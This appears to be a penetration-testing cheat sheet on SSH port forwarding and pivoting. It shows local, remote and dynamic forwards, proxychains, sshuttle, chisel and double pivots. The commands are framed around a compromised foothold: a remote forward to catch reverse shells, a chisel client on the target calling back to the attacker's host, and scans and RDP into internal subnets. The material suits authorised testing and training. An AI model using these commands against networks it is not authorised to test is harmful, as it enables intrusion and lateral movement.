SSH Port Forwarding & Tunneling
Local, remote and dynamic SSH forwards with a clear which-IP-goes-where guide, plus proxychains, sshuttle and chisel for reaching and chaining into internal networks.
Which IP goes where
In ssh -L localport:TARGET:targetport user@PIVOT:
PIVOT= the host you SSH into (your foothold).TARGET= the internal host, resolved from the pivot’s perspective (often127.0.0.1or a NET-B IP).- You then connect to
127.0.0.1:localporton your box.
Local forward (-L): pull one remote port to you
Reach an internal service on your localhost:
ssh -L 8080:172.16.1.5:80 user@<PIVOT> -NThen browse it locally:
curl http://127.0.0.1:8080Remote forward (-R): push one of your ports out
Expose your handler to the internal network (for reverse shells):
ssh -R 4444:127.0.0.1:4444 user@<PIVOT> -NDynamic forward (-D): the whole subnet via SOCKS
Open a SOCKS proxy:
ssh -D 1080 user@<PIVOT> -NAdd it to proxychains:
echo 'socks5 127.0.0.1 1080' | sudo tee -a /etc/proxychains4.confRun tools through it:
proxychains -q nmap -sT -Pn 172.16.1.0/24proxychains -q xfreerdp /v:172.16.1.5 /u:adminsshuttle (VPN-like, no proxychains)
Route a subnet through the pivot:
sshuttle -r user@<PIVOT> 172.16.1.0/24chisel (when you have a foothold but no SSH)
Server on your box (reverse mode):
./chisel server -p 8000 --reverseClient on the target, exposing a SOCKS proxy back to you:
./chisel client <YOUR_IP>:8000 R:socksDouble pivot
Chain a second dynamic forward through the first. From a shell on PIVOT2 (reached via the first SOCKS), open another:
ssh -D 1081 user@<PIVOT2> -NAdd the second proxy below the first in proxychains so it chains:
echo 'socks5 127.0.0.1 1081' | sudo tee -a /etc/proxychains4.confRule of thumb:
-Lpulls a single remote port to you,-Rpushes one of yours out,-Dgives you the whole subnet via SOCKS. For multi-hop, stack-Dproxies in proxychains (top = closest to you).